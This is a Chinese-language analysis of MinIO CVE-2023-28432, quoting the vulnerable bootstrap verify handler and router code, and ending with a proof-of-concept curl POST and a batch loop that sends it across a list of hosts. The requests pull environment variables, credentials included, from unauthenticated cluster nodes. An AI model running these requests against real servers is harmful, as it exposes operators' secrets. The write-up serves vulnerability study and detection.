MinIO 信息泄漏分析与复现 CVE-2023-28432
简介
官方安全通告中给出的漏洞代码：
// minio/cmd/bootstrap-peer-server.go
// VerifyHandler answers a bootstrap "verify" request by serializing this
// node's ServerSystemConfig (see getServerSystemCfg: the endpoint list plus
// every MINIO_* environment variable not listed in skipEnvs) as JSON onto
// the response.
//
// NOTE(review): nothing here checks who is asking. No credential or peer
// check runs before the config is encoded, and the only wrapper on the
// route (see registerBootstrapRESTHandlers) is httpTraceHdrs, which looks
// like tracing only. Any client that can reach the endpoint therefore
// receives MinioEnv in plaintext; that is the information disclosure
// tracked as CVE-2023-28432 (advisory linked at the end of this page).
func (b *bootstrapRESTServer) VerifyHandler(w http.ResponseWriter, r *http.Request) {
	// presumably builds a request-scoped context tagged with the handler name — confirm
	ctx := newContext(r, w, "VerifyHandler")
	cfg := getServerSystemCfg()
	// An encode error is only logged; whatever bytes were already written
	// have reached the caller by then.
	logger.LogIf(ctx, json.NewEncoder(w).Encode(&cfg))
}
// minio/cmd/bootstrap-peer-server.go
// getServerSystemCfg snapshots the node-local settings that peers compare
// during bootstrap: the global endpoint list and every environment variable
// whose name starts with "MINIO_", except those listed in skipEnvs.
//
// Values are copied verbatim, so anything sensitive that is configured
// through a MINIO_* variable (credentials included) lands in the returned
// MinioEnv map; whoever serializes this struct onto the wire is handing
// those values out.
func getServerSystemCfg() ServerSystemConfig {
	names := env.List("MINIO_")
	minioEnv := make(map[string]string, len(names))
	for _, name := range names {
		// Variables in the skipEnvs allowlist are expected to differ from
		// node to node, so they are left out of the comparison set; extend
		// skipEnvs() when adding another such variable.
		if _, perNode := skipEnvs[name]; !perNode {
			minioEnv[name] = env.Get(name, "")
		}
	}

	cfg := ServerSystemConfig{
		MinioEndpoints: globalEndpoints,
		MinioEnv:       minioEnv,
	}
	return cfg
}
还原一下，对应的 API 路由大概是这样的：
# /minio/cmd/routers.go
// configureServerHandler builds the top-level HTTP router. Only the part
// relevant to the bootstrap route is reproduced here; the remainder is
// elided by the author as "...".
func configureServerHandler(endpointServerPools EndpointServerPools) (http.Handler, error) {
	// Initialize router. `SkipClean(true)` stops minio/mux from
	// normalizing URL path minio/minio#3256
	router := mux.NewRouter().SkipClean(true).UseEncodedPath()
	// Initialize distributed NS lock.
	// The distributed-erasure routers — and with them the bootstrap
	// /verify route — are registered only when globalIsDistErasure is
	// set, which is why the PoC on this page requires cluster mode.
	if globalIsDistErasure {
		registerDistErasureRouters(router, endpointServerPools)
	}
	...
}
// registerDistErasureRouters wires up every REST router that exists only in
// a distributed (erasure-coded) deployment. configureServerHandler calls it
// solely when globalIsDistErasure is set, so none of these routes —
// including the bootstrap /verify route — exist on a single-node server.
// Registration order is kept as written; it may determine route precedence
// on the mux, so do not reorder casually.
func registerDistErasureRouters(router *mux.Router, endpointServerPools EndpointServerPools) {
	// Register storage REST router only if its a distributed setup.
	registerStorageRESTHandlers(router, endpointServerPools)
	// Register peer REST router only if its a distributed setup.
	registerPeerRESTHandlers(router)
	// Register peer S3 router only if its a distributed setup.
	registerPeerS3Handlers(router)
	// Register bootstrap REST router for distributed setups.
	// This is the router that exposes VerifyHandler (see registerBootstrapRESTHandlers).
	registerBootstrapRESTHandlers(router) // this one
	// Register distributed namespace lock routers.
	registerLockRESTHandlers(router)
}
# /minio/cmd/bootstrap-peer-server.go
// registerBootstrapRESTHandlers mounts the bootstrap REST API under
// bootstrapRESTPrefix. Both routes are POST-only, versioned with
// bootstrapRESTVersionPrefix, and wrapped only by httpTraceHdrs — no
// authentication layer appears on this path, which is what left the
// verify route reachable by any client able to connect to the port.
func registerBootstrapRESTHandlers(router *mux.Router) {
	srv := &bootstrapRESTServer{}
	sub := router.PathPrefix(bootstrapRESTPrefix).Subrouter()

	// Route table: method suffix -> handler. Order matches the original
	// registration order (health first, then verify).
	routes := []struct {
		suffix  string
		handler http.HandlerFunc
	}{
		{bootstrapRESTMethodHealth, srv.HealthHandler},
		{bootstrapRESTMethodVerify, srv.VerifyHandler}, // the vulnerable route
	}
	for _, rt := range routes {
		sub.Methods(http.MethodPost).
			Path(bootstrapRESTVersionPrefix + rt.suffix).
			HandlerFunc(httpTraceHdrs(rt.handler))
	}
}
POC
# Requires distributed (cluster) mode: the bootstrap routes are registered
# only when globalIsDistErasure is set (see configureServerHandler above).
curl -XPOST x.x.x.x:9000/minio/bootstrap/v1/verify
# Simple batch check: one request per whitespace-separated host listed in the
# file "mini", giving up on each connection after 3 seconds.
# Defender note: an unauthenticated POST to /minio/bootstrap/v1/verify that does
# not originate from one of the cluster's own nodes is a useful detection signal.
for i in `cat mini`; do echo $i;curl -XPOST $i/minio/bootstrap/v1/verify --connect-timeout 3; done
参考链接
https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q
https://nosec.org/home/detail/5073.html